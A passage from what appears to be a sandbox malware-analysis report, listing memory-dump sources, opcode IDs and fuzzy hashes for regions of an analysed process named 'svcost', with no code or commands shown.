                                                                                            • Instruction Fuzzy Hash: 57E09A6155E7C15FD7079B308C654447F74BD5320079A82EFD898CF0ABD7686858C363
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 38b1e4e43c895d8e0ee25da1853e177a8f68b18b3f603848a6972d98ba60d859
                                                                                            • Instruction ID: 4f84d196b5318eedcb9d5e65e9c6fca7f1bb2e8b470c48641581e4276e01e397
                                                                                            • Opcode Fuzzy Hash: 38b1e4e43c895d8e0ee25da1853e177a8f68b18b3f603848a6972d98ba60d859
                                                                                            • Instruction Fuzzy Hash: B4E0263494D2889FC304CBA4DC20A79BFA8DB47304F2481EDC8198B262C7324D02CF01
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fe164051b5d3b0f306e7e661c7bed131044ef216b28469753910c8a6dbf463a7
                                                                                            • Instruction ID: 43578ca72e251c2c8aeea3ae8a3e95c543370f67ee8838489732b44127122cea
                                                                                            • Opcode Fuzzy Hash: fe164051b5d3b0f306e7e661c7bed131044ef216b28469753910c8a6dbf463a7
                                                                                            • Instruction Fuzzy Hash: 73E06570D01308EFCB04DFA8C400A9DBBB8EB48300F00C0BAD804A2340D7369A40CF81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d225cc6799801dde5a56fe151b4b48cf06c019e269523df717a442373f179846
                                                                                            • Instruction ID: 5833c54f0f17931cebef65fbae14d0966b60784b43de0a6139655ba56aec7791
                                                                                            • Opcode Fuzzy Hash: d225cc6799801dde5a56fe151b4b48cf06c019e269523df717a442373f179846
                                                                                            • Instruction Fuzzy Hash: C8E0E574E05208EFCB44DFA8D550AADBBF4EB49304F10C1EAD81893340D7319A46CF81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 569735aeea76f13e11dc55d566a4d0891712cd6f4ebda084596fd4f760f335c5
                                                                                            • Instruction ID: 52ae6169a46abe5d66248e697685d2cf9023edd0e8ccca18b8b7992bcec29523
                                                                                            • Opcode Fuzzy Hash: 569735aeea76f13e11dc55d566a4d0891712cd6f4ebda084596fd4f760f335c5
                                                                                            • Instruction Fuzzy Hash: 91E04FB690E7C15FCF0AAF746DAA2843F71AF5321AB5E04DEC440CE063E559860E8756
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0211e591d99b313ddab6d9e092930173e8667bbc71e19cb2929240eb7e5ae3ff
                                                                                            • Instruction ID: cc2fe078bb07f49b722427fc2e3b7e3dd1a01d9c5269840c3834fd1fc67404e0
                                                                                            • Opcode Fuzzy Hash: 0211e591d99b313ddab6d9e092930173e8667bbc71e19cb2929240eb7e5ae3ff
                                                                                            • Instruction Fuzzy Hash: 44E092308092849FCB45CBA4C560AECBFB5EB07209F1481EED84497652C6325A06DB01
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1e0b6979b76af097917202a2dcd8f091441e1c4fdbb38cd69d1c58fdea639216
                                                                                            • Instruction ID: 25e6c57c6a3e7453ac0d44a58cd0d0020a6277f94ddd789bff7cb2adae15bdb2
                                                                                            • Opcode Fuzzy Hash: 1e0b6979b76af097917202a2dcd8f091441e1c4fdbb38cd69d1c58fdea639216
                                                                                            • Instruction Fuzzy Hash: F8E01A74D05308EFCB44DFA8D514A9DBBB9EB49304F50C1BAD814A3350D7359A51DF81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2614ea0c8e489f3507e05dfe0c16e1e6a4683e415fc72675824fa45411e792da
                                                                                            • Instruction ID: 27728ccedc9182f197191437a22ed3e099de5fa55b1782815707471b8bc35cc7
                                                                                            • Opcode Fuzzy Hash: 2614ea0c8e489f3507e05dfe0c16e1e6a4683e415fc72675824fa45411e792da
                                                                                            • Instruction Fuzzy Hash: EDE0E574E05208EFCB44DFA8D5A0AACFBF8EB49304F10C1A98818A3341D7329A42CF41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2614ea0c8e489f3507e05dfe0c16e1e6a4683e415fc72675824fa45411e792da
                                                                                            • Instruction ID: adad8bf9a3be0887d7b2e9ae1f1f5194d24cbffddd8c96134562b2302a45b6ee
                                                                                            • Opcode Fuzzy Hash: 2614ea0c8e489f3507e05dfe0c16e1e6a4683e415fc72675824fa45411e792da
                                                                                            • Instruction Fuzzy Hash: DDE0E574E06208EFCB48DFA8D565AACFBF8EB49304F10C1A9881893341D7319A42CF41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: efd7e847ab12ba5b9ef2ba9619a274acaedbd8f520b8c46f6d89ae996c373c8f
                                                                                            • Instruction ID: 22e6ebc48cbd319c3ad22756ec431d6abc90f4fcac7c5264845aad7919bca3ad
                                                                                            • Opcode Fuzzy Hash: efd7e847ab12ba5b9ef2ba9619a274acaedbd8f520b8c46f6d89ae996c373c8f
                                                                                            • Instruction Fuzzy Hash: F5E0EC74909608DBC704DF94D9519ADBB79EB46315F1091E9CC0927351CB32AA52CB89
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: 1fb96a14bdad6b2fc1be8856d327c727feb0f771faef845d0cf5bdd75786b035
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: 16E0EC34A05208EBDB08DF94DA519ADBB79EB46305F2091A9CC1867751CB329E42DB81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: 36b66c70e5febc301193420c61b910d2c5d51b1cda2afdc5fce5b04e9c7a9f60
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: E0E01234905209EBCB04DF95DA61AADFB7DEB46305F2491EDC80817751CB329E46DB81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: 3cf571e712a08d4be40dcdcbe3bb3ba64d8a693e1e4017e99885ba239f759128
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: 40E0EC74909218DBCB04DF94D9519ADBB79EB46305F2091A9C80927751CB32AE42DB85
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4625495ee726b04b84683d42fcaf2d83f504054a275a651c858e6eab1b45fd5e
                                                                                            • Instruction ID: 0b580c2a61164847b7598f6616d554aab110428c533e437a91b87ca34596c51f
                                                                                            • Opcode Fuzzy Hash: 4625495ee726b04b84683d42fcaf2d83f504054a275a651c858e6eab1b45fd5e
                                                                                            • Instruction Fuzzy Hash: 87E0C27080220CEBDB00EFB58910A9E77A8EB02304F1040B6C10593261DE325E048BE2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: c9fb49d2fc05785b7fab7924666536c35decb4a9947190802436a33c3bba0f8f
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: E8E01234905208DBCF04DF94D9519ADBBBDEB46305F2091EDC80817751CB329E46DF81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: 9f231495d32b54e692c78c4a064b762f17c8d81d2563a01d198bae0ab4e8d398
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: 8AE01234909208DBCB04DF94E9519ADBFB9EB46305F2091E9C80817751DB32AE42DF91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: eb812f134bc7f8595a357f4ffd8f8982e6175f9e502a4d2329b166a6329c651e
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: CFE01274909208DBCB04DF94D9519BDBB79EF86305F2091E9C80817791DB329E46DB81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: 3b7e937c323f9ca4ddd9ffe03d8d707ee6590218d9834edb580aef651b0688d2
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: EDE08C38905208DBCB14DB94E950AACBB79EB46304F20C1A8CC0853740CA329E42DB81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction ID: 57508bef4ac592bc385569757f9d004787a31da0be07e90dd42478256ffc13c6
                                                                                            • Opcode Fuzzy Hash: 853cea21dc872cc67b249e8c34d1d6b836ff131a0269f8f0551835e295e93c3f
                                                                                            • Instruction Fuzzy Hash: 55E0C23490520CDBCB04DF94E9509ACBBB9EB46304F2091E8C80817740CB329E43CB81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e1b5b0cae13efb505f176445bab195afc9eed22d5a80d795ab6a431c10d6bc56
                                                                                            • Instruction ID: 3fb8ff2e57dc6232200b72e729d3a8f8d0edcbd8dd7d5ff514bf890d31b3875b
                                                                                            • Opcode Fuzzy Hash: e1b5b0cae13efb505f176445bab195afc9eed22d5a80d795ab6a431c10d6bc56
                                                                                            • Instruction Fuzzy Hash: AAE01234905308EBC704DF94DA6196DBB79EB4A319F1491EDD80817751CB32AE52CBC1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5232242e328bcca84034d51d50d64b9422bce2df7cc9fa1d05ab1e30d9246998
                                                                                            • Instruction ID: 3f64b30a1a0f2ad07fb4842325b1d288833a48836d75b3241f114ea69b2c6002
                                                                                            • Opcode Fuzzy Hash: 5232242e328bcca84034d51d50d64b9422bce2df7cc9fa1d05ab1e30d9246998
                                                                                            • Instruction Fuzzy Hash: DBE0EC74D4520CEFCB44EFB8D96969DBBB8EB0520AF5051B9C808A3660EB315A84CB41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9a83f96c19313f74bee7d19c9a189e3384704af538253723492d635c40cda07a
                                                                                            • Instruction ID: 087518312b445214af20e6f7ce1889ad38b269cfcbb6cf0923d9f381bc3e47cb
                                                                                            • Opcode Fuzzy Hash: 9a83f96c19313f74bee7d19c9a189e3384704af538253723492d635c40cda07a
                                                                                            • Instruction Fuzzy Hash: FCE0C271A0030CEBCB00DFB4EC5566DB7B9EB84200F5085A8E4089B244DA711F119784
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c2f08ce0612dea361e39c761f91a826827dc2b68c355d769b841d9c46356d9b5
                                                                                            • Instruction ID: 195cff1ecd33f349a30e0dad5db948f826a33a8087862b3958e6ad4ad3f1cfe1
                                                                                            • Opcode Fuzzy Hash: c2f08ce0612dea361e39c761f91a826827dc2b68c355d769b841d9c46356d9b5
                                                                                            • Instruction Fuzzy Hash: 3ED05B7490A20CDBCB04DFA4D936A6DBB7CEB46305F1091B8D40823650C7311981DF55
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 673da476bdb1ceae40fc4950f9640442b619bacf244c76aa96d5c84427f4e1db
                                                                                            • Instruction ID: f7f930a84e811143bd6f745f67d08bf837a59c8a627e8540ed8644f164c86816
                                                                                            • Opcode Fuzzy Hash: 673da476bdb1ceae40fc4950f9640442b619bacf244c76aa96d5c84427f4e1db
                                                                                            • Instruction Fuzzy Hash: 33E01271A0020CEFCB40DFE5E54165DB7F9DB45311F5085A9D808D7345DA315F019795
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d9b4c49547b441e5921eec09c5983540425313e97fd3a7f7a5fb7cf236b60a73
                                                                                            • Instruction ID: af33b0668bc40f471918aae4929b45a57f8684133e96521b15642e13264c2ff1
                                                                                            • Opcode Fuzzy Hash: d9b4c49547b441e5921eec09c5983540425313e97fd3a7f7a5fb7cf236b60a73
                                                                                            • Instruction Fuzzy Hash: EFD017B8A102188BCB04EFA4D8587AD77F5AB55301F1005A9C0096B728CB719981CF40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7380e38ff939aa8aef433055fe65cf96080878002fb045da9b46614f13c41027
                                                                                            • Instruction ID: 0269e46fc8e4473da4482b11321ef6b517e8c4240eb800b3dc93bafa2d1bfe80
                                                                                            • Opcode Fuzzy Hash: 7380e38ff939aa8aef433055fe65cf96080878002fb045da9b46614f13c41027
                                                                                            • Instruction Fuzzy Hash: 56C04C7804B70987D2145755AA38FBA7A9C970720AF406565DD0D015724B715061CA5A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd